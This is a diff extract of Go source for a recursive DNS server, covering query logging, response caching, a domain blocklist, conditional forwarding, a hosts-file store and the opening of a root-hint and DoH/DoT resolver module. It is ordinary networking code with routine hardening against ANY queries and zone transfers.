StartTime: s.metrics.StartTime,
|
||||
}
|
||||
}
|
||||
|
||||
// GetQueryLog returns the last N query log entries.
|
||||
func (s *DNSServer) GetQueryLog(limit int) []QueryLogEntry {
|
||||
s.queryLogMu.RLock()
|
||||
defer s.queryLogMu.RUnlock()
|
||||
|
||||
n := len(s.queryLog)
|
||||
if limit <= 0 || limit > n {
|
||||
limit = n
|
||||
}
|
||||
// Return most recent first
|
||||
result := make([]QueryLogEntry, limit)
|
||||
for i := 0; i < limit; i++ {
|
||||
result[i] = s.queryLog[n-1-i]
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// ClearQueryLog empties the log.
|
||||
func (s *DNSServer) ClearQueryLog() {
|
||||
s.queryLogMu.Lock()
|
||||
s.queryLog = s.queryLog[:0]
|
||||
s.queryLogMu.Unlock()
|
||||
}
|
||||
|
||||
// GetCacheEntries returns all cache entries.
|
||||
func (s *DNSServer) GetCacheEntries() []CacheInfo {
|
||||
s.cacheMu.RLock()
|
||||
defer s.cacheMu.RUnlock()
|
||||
|
||||
now := time.Now()
|
||||
entries := make([]CacheInfo, 0, len(s.cache))
|
||||
for key, entry := range s.cache {
|
||||
if now.After(entry.expiresAt) {
|
||||
continue
|
||||
}
|
||||
parts := strings.SplitN(key, "/", 2)
|
||||
name, qtype := key, ""
|
||||
if len(parts) == 2 {
|
||||
name, qtype = parts[0], parts[1]
|
||||
}
|
||||
entries = append(entries, CacheInfo{
|
||||
Key: key,
|
||||
Name: name,
|
||||
Type: qtype,
|
||||
TTL: int(entry.expiresAt.Sub(now).Seconds()),
|
||||
Answers: len(entry.msg.Answer),
|
||||
ExpiresAt: entry.expiresAt.Format(time.RFC3339),
|
||||
})
|
||||
}
|
||||
return entries
|
||||
}
|
||||
|
||||
// CacheSize returns number of active cache entries.
|
||||
func (s *DNSServer) CacheSize() int {
|
||||
s.cacheMu.RLock()
|
||||
defer s.cacheMu.RUnlock()
|
||||
return len(s.cache)
|
||||
}
|
||||
|
||||
// FlushCache clears all cached responses.
|
||||
func (s *DNSServer) FlushCache() int {
|
||||
s.cacheMu.Lock()
|
||||
n := len(s.cache)
|
||||
s.cache = make(map[string]*CacheEntry)
|
||||
s.cacheMu.Unlock()
|
||||
// Also flush resolver NS cache
|
||||
s.resolver.FlushNSCache()
|
||||
return n
|
||||
}
|
||||
|
||||
// FlushCacheEntry removes a single cache entry.
|
||||
func (s *DNSServer) FlushCacheEntry(key string) bool {
|
||||
s.cacheMu.Lock()
|
||||
defer s.cacheMu.Unlock()
|
||||
if _, ok := s.cache[key]; ok {
|
||||
delete(s.cache, key)
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// GetTopDomains returns the most-queried domains.
|
||||
func (s *DNSServer) GetTopDomains(limit int) []DomainCount {
|
||||
s.domainCountsMu.RLock()
|
||||
defer s.domainCountsMu.RUnlock()
|
||||
|
||||
counts := make([]DomainCount, 0, len(s.domainCounts))
|
||||
for domain, count := range s.domainCounts {
|
||||
counts = append(counts, DomainCount{Domain: domain, Count: count})
|
||||
}
|
||||
sort.Slice(counts, func(i, j int) bool { return counts[i].Count > counts[j].Count })
|
||||
if limit > 0 && limit < len(counts) {
|
||||
counts = counts[:limit]
|
||||
}
|
||||
return counts
|
||||
}
|
||||
|
||||
// GetQueryTypeCounts returns counts by query type.
|
||||
func (s *DNSServer) GetQueryTypeCounts() map[string]uint64 {
|
||||
s.typeCountsMu.RLock()
|
||||
defer s.typeCountsMu.RUnlock()
|
||||
result := make(map[string]uint64, len(s.typeCounts))
|
||||
for k, v := range s.typeCounts {
|
||||
result[k] = v
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// GetClientCounts returns counts by client IP.
|
||||
func (s *DNSServer) GetClientCounts() map[string]uint64 {
|
||||
s.clientCountsMu.RLock()
|
||||
defer s.clientCountsMu.RUnlock()
|
||||
result := make(map[string]uint64, len(s.clientCounts))
|
||||
for k, v := range s.clientCounts {
|
||||
result[k] = v
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// AddBlocklistEntry adds a domain to the blocklist.
|
||||
func (s *DNSServer) AddBlocklistEntry(domain string) {
|
||||
s.blocklistMu.Lock()
|
||||
s.blocklist[dns.Fqdn(strings.ToLower(domain))] = true
|
||||
s.blocklistMu.Unlock()
|
||||
}
|
||||
|
||||
// RemoveBlocklistEntry removes a domain from the blocklist.
|
||||
func (s *DNSServer) RemoveBlocklistEntry(domain string) {
|
||||
s.blocklistMu.Lock()
|
||||
delete(s.blocklist, dns.Fqdn(strings.ToLower(domain)))
|
||||
s.blocklistMu.Unlock()
|
||||
}
|
||||
|
||||
// GetBlocklist returns all blocked domains.
|
||||
func (s *DNSServer) GetBlocklist() []string {
|
||||
s.blocklistMu.RLock()
|
||||
defer s.blocklistMu.RUnlock()
|
||||
list := make([]string, 0, len(s.blocklist))
|
||||
for domain := range s.blocklist {
|
||||
list = append(list, domain)
|
||||
}
|
||||
sort.Strings(list)
|
||||
return list
|
||||
}
|
||||
|
||||
// ImportBlocklist adds multiple domains at once.
|
||||
func (s *DNSServer) ImportBlocklist(domains []string) int {
|
||||
s.blocklistMu.Lock()
|
||||
defer s.blocklistMu.Unlock()
|
||||
count := 0
|
||||
for _, d := range domains {
|
||||
d = strings.TrimSpace(strings.ToLower(d))
|
||||
if d == "" || strings.HasPrefix(d, "#") {
|
||||
continue
|
||||
}
|
||||
s.blocklist[dns.Fqdn(d)] = true
|
||||
count++
|
||||
}
|
||||
return count
|
||||
}
|
||||
|
||||
// SetConditionalForward sets upstream servers for a specific zone.
|
||||
func (s *DNSServer) SetConditionalForward(zone string, upstreams []string) {
|
||||
s.conditionalFwdMu.Lock()
|
||||
s.conditionalFwd[dns.Fqdn(strings.ToLower(zone))] = upstreams
|
||||
s.conditionalFwdMu.Unlock()
|
||||
}
|
||||
|
||||
// RemoveConditionalForward removes conditional forwarding for a zone.
|
||||
func (s *DNSServer) RemoveConditionalForward(zone string) {
|
||||
s.conditionalFwdMu.Lock()
|
||||
delete(s.conditionalFwd, dns.Fqdn(strings.ToLower(zone)))
|
||||
s.conditionalFwdMu.Unlock()
|
||||
}
|
||||
|
||||
// GetConditionalForwards returns all conditional forwarding rules.
|
||||
func (s *DNSServer) GetConditionalForwards() map[string][]string {
|
||||
s.conditionalFwdMu.RLock()
|
||||
defer s.conditionalFwdMu.RUnlock()
|
||||
result := make(map[string][]string, len(s.conditionalFwd))
|
||||
for k, v := range s.conditionalFwd {
|
||||
result[k] = v
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// GetResolverNSCache returns the resolver's NS delegation cache.
|
||||
func (s *DNSServer) GetResolverNSCache() map[string][]string {
|
||||
return s.resolver.GetNSCache()
|
||||
}
|
||||
|
||||
func (s *DNSServer) handleQuery(w dns.ResponseWriter, r *dns.Msg) {
|
||||
start := time.Now()
|
||||
atomic.AddUint64(&s.metrics.TotalQueries, 1)
|
||||
|
||||
msg := new(dns.Msg)
|
||||
msg.SetReply(r)
|
||||
msg.Authoritative = false
|
||||
msg.RecursionAvailable = true
|
||||
|
||||
if len(r.Question) == 0 {
|
||||
msg.Rcode = dns.RcodeFormatError
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
q := r.Question[0]
|
||||
qName := q.Name
|
||||
qTypeStr := dns.TypeToString[q.Qtype]
|
||||
clientAddr := w.RemoteAddr().String()
|
||||
|
||||
// Track stats
|
||||
s.trackDomain(qName)
|
||||
s.trackType(qTypeStr)
|
||||
s.trackClient(clientAddr)
|
||||
|
||||
if s.cfg.LogQueries {
|
||||
log.Printf("[query] %s %s from %s", qTypeStr, qName, clientAddr)
|
||||
}
|
||||
|
||||
// Security: Refuse ANY queries (DNS amplification protection)
|
||||
if s.cfg.RefuseANY && q.Qtype == dns.TypeANY {
|
||||
msg.Rcode = dns.RcodeNotImplemented
|
||||
atomic.AddUint64(&s.metrics.FailedQ, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "NOTIMPL", 0, time.Since(start), "blocked")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
// Security: Block zone transfer requests (AXFR/IXFR)
|
||||
if q.Qtype == dns.TypeAXFR || q.Qtype == dns.TypeIXFR {
|
||||
msg.Rcode = dns.RcodeRefused
|
||||
atomic.AddUint64(&s.metrics.FailedQ, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "REFUSED", 0, time.Since(start), "blocked")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
// Security: Minimal responses — don't expose server info
|
||||
if s.cfg.MinimalResponses {
|
||||
if q.Qtype == dns.TypeTXT && (qName == "version.bind." || qName == "hostname.bind." || qName == "version.server.") {
|
||||
msg.Rcode = dns.RcodeRefused
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "REFUSED", 0, time.Since(start), "blocked")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// Blocklist check
|
||||
if s.isBlocked(qName) {
|
||||
msg.Rcode = dns.RcodeNameError // NXDOMAIN
|
||||
atomic.AddUint64(&s.metrics.BlockedQ, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "NXDOMAIN", 0, time.Since(start), "blocked")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
// 1a. Check hosts file
|
||||
hostsAnswers := s.hosts.Lookup(qName, q.Qtype)
|
||||
if len(hostsAnswers) > 0 {
|
||||
msg.Authoritative = true
|
||||
msg.Answer = hostsAnswers
|
||||
atomic.AddUint64(&s.metrics.LocalAnswers, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "NOERROR", len(hostsAnswers), time.Since(start), "hosts")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
// 1b. Check local zones
|
||||
answers := s.store.Lookup(qName, q.Qtype)
|
||||
if len(answers) > 0 {
|
||||
msg.Authoritative = true
|
||||
msg.Answer = answers
|
||||
atomic.AddUint64(&s.metrics.LocalAnswers, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "NOERROR", len(answers), time.Since(start), "local")
|
||||
w.WriteMsg(msg)
|
||||
return
|
||||
}
|
||||
|
||||
// 2. Check cache
|
||||
cacheKey := cacheKeyFor(q)
|
||||
if cached := s.getCached(cacheKey); cached != nil {
|
||||
cached.SetReply(r)
|
||||
atomic.AddUint64(&s.metrics.CacheHits, 1)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[cached.Rcode], len(cached.Answer), time.Since(start), "cache")
|
||||
w.WriteMsg(cached)
|
||||
return
|
||||
}
|
||||
atomic.AddUint64(&s.metrics.CacheMisses, 1)
|
||||
|
||||
// 3. Check conditional forwarding
|
||||
if fwdServers := s.getConditionalForward(qName); fwdServers != nil {
|
||||
c := &dns.Client{Timeout: 5 * time.Second}
|
||||
for _, srv := range fwdServers {
|
||||
resp, _, err := c.Exchange(r, srv)
|
||||
if err == nil && resp != nil {
|
||||
atomic.AddUint64(&s.metrics.ResolvedQ, 1)
|
||||
s.putCache(cacheKey, resp)
|
||||
resp.SetReply(r)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[resp.Rcode], len(resp.Answer), time.Since(start), "conditional")
|
||||
w.WriteMsg(resp)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 4. Recursive resolution from root hints (with optional upstream fallback)
|
||||
resp := s.resolver.ResolveWithFallback(r, s.cfg.Upstream)
|
||||
if resp != nil {
|
||||
atomic.AddUint64(&s.metrics.ResolvedQ, 1)
|
||||
s.putCache(cacheKey, resp)
|
||||
resp.SetReply(r)
|
||||
s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[resp.Rcode], len(resp.Answer), time.Since(start), "recursive")
|
||||
w.WriteMsg(resp)
|
||||
return
|
||||
}
|
||||
|
||||
// 5. SERVFAIL
|
||||
atomic.AddUint64(&s.metrics.FailedQ, 1)
|
||||
msg.Rcode = dns.RcodeServerFailure
|
||||
s.logQuery(clientAddr, qName, qTypeStr, "SERVFAIL", 0, time.Since(start), "failed")
|
||||
w.WriteMsg(msg)
|
||||
}
|
||||
|
||||
// ── Blocklist ────────────────────────────────────────────────────────
|
||||
|
||||
func (s *DNSServer) isBlocked(name string) bool {
|
||||
s.blocklistMu.RLock()
|
||||
defer s.blocklistMu.RUnlock()
|
||||
|
||||
fqdn := dns.Fqdn(strings.ToLower(name))
|
||||
// Exact match
|
||||
if s.blocklist[fqdn] {
|
||||
return true
|
||||
}
|
||||
// Wildcard: check parent domains
|
||||
labels := dns.SplitDomainName(fqdn)
|
||||
for i := 1; i < len(labels); i++ {
|
||||
parent := dns.Fqdn(strings.Join(labels[i:], "."))
|
||||
if s.blocklist[parent] {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// ── Conditional forwarding ───────────────────────────────────────────
|
||||
|
||||
func (s *DNSServer) getConditionalForward(name string) []string {
|
||||
s.conditionalFwdMu.RLock()
|
||||
defer s.conditionalFwdMu.RUnlock()
|
||||
|
||||
fqdn := dns.Fqdn(strings.ToLower(name))
|
||||
labels := dns.SplitDomainName(fqdn)
|
||||
for i := 0; i < len(labels); i++ {
|
||||
zone := dns.Fqdn(strings.Join(labels[i:], "."))
|
||||
if servers, ok := s.conditionalFwd[zone]; ok {
|
||||
return servers
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ── Tracking ─────────────────────────────────────────────────────────
|
||||
|
||||
func (s *DNSServer) trackDomain(name string) {
|
||||
s.domainCountsMu.Lock()
|
||||
s.domainCounts[name]++
|
||||
s.domainCountsMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *DNSServer) trackType(qtype string) {
|
||||
s.typeCountsMu.Lock()
|
||||
s.typeCounts[qtype]++
|
||||
s.typeCountsMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *DNSServer) trackClient(addr string) {
|
||||
// Strip port
|
||||
if idx := strings.LastIndex(addr, ":"); idx > 0 {
|
||||
addr = addr[:idx]
|
||||
}
|
||||
s.clientCountsMu.Lock()
|
||||
s.clientCounts[addr]++
|
||||
s.clientCountsMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *DNSServer) logQuery(client, name, qtype, rcode string, answers int, latency time.Duration, source string) {
|
||||
entry := QueryLogEntry{
|
||||
Timestamp: time.Now().UTC().Format(time.RFC3339Nano),
|
||||
Client: client,
|
||||
Name: name,
|
||||
Type: qtype,
|
||||
Rcode: rcode,
|
||||
Answers: answers,
|
||||
Latency: latency.String(),
|
||||
Source: source,
|
||||
}
|
||||
|
||||
s.queryLogMu.Lock()
|
||||
if len(s.queryLog) >= s.queryLogMax {
|
||||
// Shift: remove oldest 10%
|
||||
trim := s.queryLogMax / 10
|
||||
copy(s.queryLog, s.queryLog[trim:])
|
||||
s.queryLog = s.queryLog[:len(s.queryLog)-trim]
|
||||
}
|
||||
s.queryLog = append(s.queryLog, entry)
|
||||
s.queryLogMu.Unlock()
|
||||
}
|
||||
|
||||
// ── Cache ────────────────────────────────────────────────────────────
|
||||
|
||||
func cacheKeyFor(q dns.Question) string {
|
||||
return q.Name + "/" + dns.TypeToString[q.Qtype]
|
||||
}
|
||||
|
||||
func (s *DNSServer) getCached(key string) *dns.Msg {
|
||||
s.cacheMu.RLock()
|
||||
defer s.cacheMu.RUnlock()
|
||||
entry, ok := s.cache[key]
|
||||
if !ok || time.Now().After(entry.expiresAt) {
|
||||
return nil
|
||||
}
|
||||
return entry.msg.Copy()
|
||||
}
|
||||
|
||||
func (s *DNSServer) putCache(key string, msg *dns.Msg) {
|
||||
ttl := time.Duration(s.cfg.CacheTTL) * time.Second
|
||||
if ttl <= 0 {
|
||||
return
|
||||
}
|
||||
s.cacheMu.Lock()
|
||||
s.cache[key] = &CacheEntry{msg: msg.Copy(), expiresAt: time.Now().Add(ttl)}
|
||||
s.cacheMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *DNSServer) cacheCleanup() {
|
||||
ticker := time.NewTicker(60 * time.Second)
|
||||
defer ticker.Stop()
|
||||
for range ticker.C {
|
||||
s.cacheMu.Lock()
|
||||
now := time.Now()
|
||||
for k, v := range s.cache {
|
||||
if now.After(v.expiresAt) {
|
||||
delete(s.cache, k)
|
||||
}
|
||||
}
|
||||
s.cacheMu.Unlock()
|
||||
}
|
||||
}
|
||||
349
services/dns-server/server/hosts.go
Normal file
349
services/dns-server/server/hosts.go
Normal file
@ -0,0 +1,349 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"fmt"
|
||||
"log"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// HostEntry represents a single hosts file entry.
|
||||
type HostEntry struct {
|
||||
IP string `json:"ip"`
|
||||
Hostname string `json:"hostname"`
|
||||
Aliases []string `json:"aliases,omitempty"`
|
||||
Comment string `json:"comment,omitempty"`
|
||||
}
|
||||
|
||||
// HostsStore manages a hosts-file-like database.
|
||||
type HostsStore struct {
|
||||
mu sync.RWMutex
|
||||
entries []HostEntry
|
||||
path string // path to hosts file on disk (if loaded from file)
|
||||
}
|
||||
|
||||
// NewHostsStore creates a new hosts store.
|
||||
func NewHostsStore() *HostsStore {
|
||||
return &HostsStore{
|
||||
entries: make([]HostEntry, 0),
|
||||
}
|
||||
}
|
||||
|
||||
// LoadFile parses a hosts file from disk.
|
||||
func (h *HostsStore) LoadFile(path string) error {
|
||||
f, err := os.Open(path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
h.path = path
|
||||
h.entries = h.entries[:0]
|
||||
|
||||
scanner := bufio.NewScanner(f)
|
||||
for scanner.Scan() {
|
||||
line := strings.TrimSpace(scanner.Text())
|
||||
if line == "" || strings.HasPrefix(line, "#") {
|
||||
continue
|
||||
}
|
||||
|
||||
// Strip inline comments
|
||||
comment := ""
|
||||
if idx := strings.Index(line, "#"); idx >= 0 {
|
||||
comment = strings.TrimSpace(line[idx+1:])
|
||||
line = strings.TrimSpace(line[:idx])
|
||||
}
|
||||
|
||||
fields := strings.Fields(line)
|
||||
if len(fields) < 2 {
|
||||
continue
|
||||
}
|
||||
|
||||
ip := fields[0]
|
||||
if net.ParseIP(ip) == nil {
|
||||
continue // invalid IP
|
||||
}
|
||||
|
||||
entry := HostEntry{
|
||||
IP: ip,
|
||||
Hostname: strings.ToLower(fields[1]),
|
||||
Comment: comment,
|
||||
}
|
||||
if len(fields) > 2 {
|
||||
aliases := make([]string, len(fields)-2)
|
||||
for i, a := range fields[2:] {
|
||||
aliases[i] = strings.ToLower(a)
|
||||
}
|
||||
entry.Aliases = aliases
|
||||
}
|
||||
h.entries = append(h.entries, entry)
|
||||
}
|
||||
|
||||
log.Printf("[hosts] Loaded %d entries from %s", len(h.entries), path)
|
||||
return scanner.Err()
|
||||
}
|
||||
|
||||
// LoadFromText parses hosts-format text (like pasting /etc/hosts content).
|
||||
func (h *HostsStore) LoadFromText(content string) int {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
count := 0
|
||||
scanner := bufio.NewScanner(strings.NewReader(content))
|
||||
for scanner.Scan() {
|
||||
line := strings.TrimSpace(scanner.Text())
|
||||
if line == "" || strings.HasPrefix(line, "#") {
|
||||
continue
|
||||
}
|
||||
|
||||
comment := ""
|
||||
if idx := strings.Index(line, "#"); idx >= 0 {
|
||||
comment = strings.TrimSpace(line[idx+1:])
|
||||
line = strings.TrimSpace(line[:idx])
|
||||
}
|
||||
|
||||
fields := strings.Fields(line)
|
||||
if len(fields) < 2 {
|
||||
continue
|
||||
}
|
||||
|
||||
ip := fields[0]
|
||||
if net.ParseIP(ip) == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
entry := HostEntry{
|
||||
IP: ip,
|
||||
Hostname: strings.ToLower(fields[1]),
|
||||
Comment: comment,
|
||||
}
|
||||
if len(fields) > 2 {
|
||||
aliases := make([]string, len(fields)-2)
|
||||
for i, a := range fields[2:] {
|
||||
aliases[i] = strings.ToLower(a)
|
||||
}
|
||||
entry.Aliases = aliases
|
||||
}
|
||||
|
||||
// Dedup by hostname
|
||||
found := false
|
||||
for i, e := range h.entries {
|
||||
if e.Hostname == entry.Hostname {
|
||||
h.entries[i] = entry
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !found {
|
||||
h.entries = append(h.entries, entry)
|
||||
}
|
||||
count++
|
||||
}
|
||||
|
||||
return count
|
||||
}
|
||||
|
||||
// Add adds a single host entry.
|
||||
func (h *HostsStore) Add(ip, hostname string, aliases []string, comment string) error {
|
||||
if net.ParseIP(ip) == nil {
|
||||
return fmt.Errorf("invalid IP: %s", ip)
|
||||
}
|
||||
hostname = strings.ToLower(strings.TrimSpace(hostname))
|
||||
if hostname == "" {
|
||||
return fmt.Errorf("hostname required")
|
||||
}
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// Check for duplicate
|
||||
for i, e := range h.entries {
|
||||
if e.Hostname == hostname {
|
||||
h.entries[i].IP = ip
|
||||
h.entries[i].Aliases = aliases
|
||||
h.entries[i].Comment = comment
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
h.entries = append(h.entries, HostEntry{
|
||||
IP: ip,
|
||||
Hostname: hostname,
|
||||
Aliases: aliases,
|
||||
Comment: comment,
|
||||
})
|
||||
return nil
|
||||
}
|
||||
|
||||
// Remove removes a host entry by hostname.
|
||||
func (h *HostsStore) Remove(hostname string) bool {
|
||||
hostname = strings.ToLower(strings.TrimSpace(hostname))
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
for i, e := range h.entries {
|
||||
if e.Hostname == hostname {
|
||||
h.entries = append(h.entries[:i], h.entries[i+1:]...)
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// Clear removes all entries.
|
||||
func (h *HostsStore) Clear() int {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
n := len(h.entries)
|
||||
h.entries = h.entries[:0]
|
||||
return n
|
||||
}
|
||||
|
||||
// List returns all entries.
|
||||
func (h *HostsStore) List() []HostEntry {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
result := make([]HostEntry, len(h.entries))
|
||||
copy(result, h.entries)
|
||||
return result
|
||||
}
|
||||
|
||||
// Count returns the number of entries.
|
||||
func (h *HostsStore) Count() int {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
return len(h.entries)
|
||||
}
|
||||
|
||||
// Lookup resolves a hostname from the hosts store.
|
||||
// Returns DNS RRs matching the query name and type.
|
||||
func (h *HostsStore) Lookup(name string, qtype uint16) []dns.RR {
|
||||
if qtype != dns.TypeA && qtype != dns.TypeAAAA && qtype != dns.TypePTR {
|
||||
return nil
|
||||
}
|
||||
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
fqdn := dns.Fqdn(strings.ToLower(name))
|
||||
baseName := strings.TrimSuffix(fqdn, ".")
|
||||
|
||||
// PTR lookup (reverse DNS)
|
||||
if qtype == dns.TypePTR {
|
||||
// Convert in-addr.arpa name to IP
|
||||
ip := ptrToIP(fqdn)
|
||||
if ip == "" {
|
||||
return nil
|
||||
}
|
||||
for _, e := range h.entries {
|
||||
if e.IP == ip {
|
||||
rr := &dns.PTR{
|
||||
Hdr: dns.RR_Header{
|
||||
Name: fqdn,
|
||||
Rrtype: dns.TypePTR,
|
||||
Class: dns.ClassINET,
|
||||
Ttl: 60,
|
||||
},
|
||||
Ptr: dns.Fqdn(e.Hostname),
|
||||
}
|
||||
return []dns.RR{rr}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Forward lookup (A / AAAA)
|
||||
var results []dns.RR
|
||||
for _, e := range h.entries {
|
||||
// Match hostname or aliases
|
||||
match := strings.EqualFold(e.Hostname, baseName) || strings.EqualFold(dns.Fqdn(e.Hostname), fqdn)
|
||||
if !match {
|
||||
for _, a := range e.Aliases {
|
||||
if strings.EqualFold(a, baseName) || strings.EqualFold(dns.Fqdn(a), fqdn) {
|
||||
match = true
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
if !match {
|
||||
continue
|
||||
}
|
||||
|
||||
ip := net.ParseIP(e.IP)
|
||||
if ip == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
if qtype == dns.TypeA && ip.To4() != nil {
|
||||
rr := &dns.A{
|
||||
Hdr: dns.RR_Header{
|
||||
Name: fqdn,
|
||||
Rrtype: dns.TypeA,
|
||||
Class: dns.ClassINET,
|
||||
Ttl: 60,
|
||||
},
|
||||
A: ip.To4(),
|
||||
}
|
||||
results = append(results, rr)
|
||||
} else if qtype == dns.TypeAAAA && ip.To4() == nil {
|
||||
rr := &dns.AAAA{
|
||||
Hdr: dns.RR_Header{
|
||||
Name: fqdn,
|
||||
Rrtype: dns.TypeAAAA,
|
||||
Class: dns.ClassINET,
|
||||
Ttl: 60,
|
||||
},
|
||||
AAAA: ip,
|
||||
}
|
||||
results = append(results, rr)
|
||||
}
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
// Export returns hosts file format text.
|
||||
func (h *HostsStore) Export() string {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
var sb strings.Builder
|
||||
sb.WriteString("# AUTARCH DNS hosts file\n")
|
||||
sb.WriteString(fmt.Sprintf("# Generated: %s\n", time.Now().UTC().Format(time.RFC3339)))
|
||||
sb.WriteString("# Entries: " + fmt.Sprintf("%d", len(h.entries)) + "\n\n")
|
||||
|
||||
for _, e := range h.entries {
|
||||
line := e.IP + "\t" + e.Hostname
|
||||
for _, a := range e.Aliases {
|
||||
line += "\t" + a
|
||||
}
|
||||
if e.Comment != "" {
|
||||
line += "\t# " + e.Comment
|
||||
}
|
||||
sb.WriteString(line + "\n")
|
||||
}
|
||||
return sb.String()
|
||||
}
|
||||
|
||||
// ptrToIP converts a PTR domain name (in-addr.arpa) to an IP string.
|
||||
func ptrToIP(name string) string {
|
||||
name = strings.TrimSuffix(strings.ToLower(name), ".")
|
||||
if !strings.HasSuffix(name, ".in-addr.arpa") {
|
||||
return ""
|
||||
}
|
||||
name = strings.TrimSuffix(name, ".in-addr.arpa")
|
||||
parts := strings.Split(name, ".")
|
||||
if len(parts) != 4 {
|
||||
return ""
|
||||
}
|
||||
// Reverse the octets
|
||||
return parts[3] + "." + parts[2] + "." + parts[1] + "." + parts[0]
|
||||
}
|
||||
528
services/dns-server/server/resolver.go
Normal file
528
services/dns-server/server/resolver.go
Normal file
@ -0,0 +1,528 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/tls"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// Root nameserver IPs (IANA root hints).
|
||||
// These are hardcoded — they almost never change.
|
||||
var rootServers = []string{
|
||||
"198.41.0.4:53", // a.root-servers.net
|
||||
"170.247.170.2:53", // b.root-servers.net
|
||||
"192.33.4.12:53", // c.root-servers.net
|
||||
"199.7.91.13:53", // d.root-servers.net
|
||||
"192.203.230.10:53", // e.root-servers.net
|
||||
"192.5.5.241:53", // f.root-servers.net
|
||||
"192.112.36.4:53", // g.root-servers.net
|
||||
"198.97.190.53:53", // h.root-servers.net
|
||||
"192.36.148.17:53", // i.root-servers.net
|
||||
"192.58.128.30:53", // j.root-servers.net
|
||||
"193.0.14.129:53", // k.root-servers.net
|
||||
"199.7.83.42:53", // l.root-servers.net
|
||||
"202.12.27.33:53", // m.root-servers.net
|
||||
}
|
||||
|
||||
// Well-known DoH endpoints — when user configures these as upstream,
|
||||
// we auto-detect and use DoH instead of plain DNS.
|
||||
var knownDoHEndpoints = map[string]string{
|
||||
"8.8.8.8": "https://dns.google/dns-query",
|
||||
"8.8.4.4": "https://dns.google/dns-query",
|
||||
"1.1.1.1": "https://cloudflare-dns.com/dns-query",
|
||||
"1.0.0.1": "https://cloudflare-dns.com/dns-query",
|
||||
"9.9.9.9": "https://dns.quad9.net/dns-query",
|
||||
"149.112.112.112": "https://dns.quad9.net/dns-query",
|
||||
"208.67.222.222": "https://dns.opendns.com/dns-query",
|
||||
"208.67.220.220": "https://dns.opendns.com/dns-query",
|
||||
"94.140.14.14": "https://dns.adguard-dns.com/dns-query",
|
||||
"94.140.15.15": "https://dns.adguard-dns.com/dns-query",
|
||||
}
|
||||
|
||||
// Well-known DoT servers — port 853 TLS.
|
||||
var knownDoTServers = map[string]string{
|
||||
"8.8.8.8": "dns.google",
|
||||
"8.8.4.4": "dns.google",
|
||||
"1.1.1.1": "one.one.one.one",
|
||||
"1.0.0.1": "one.one.one.one",
|
||||
"9.9.9.9": "dns.quad9.net",
|
||||
"149.112.112.112": "dns.quad9.net",
|
||||
"208.67.222.222": "dns.opendns.com",
|
||||
"208.67.220.220": "dns.opendns.com",
|
||||
"94.140.14.14": "dns-unfiltered.adguard.com",
|
||||
"94.140.15.15": "dns-unfiltered.adguard.com",
|
||||
}
|
||||
|
||||
// EncryptionMode determines how upstream queries are sent.
|
||||
type EncryptionMode int
|
||||
|
||||
const (
|
||||
ModePlain EncryptionMode = iota // Standard UDP/TCP DNS
|
||||
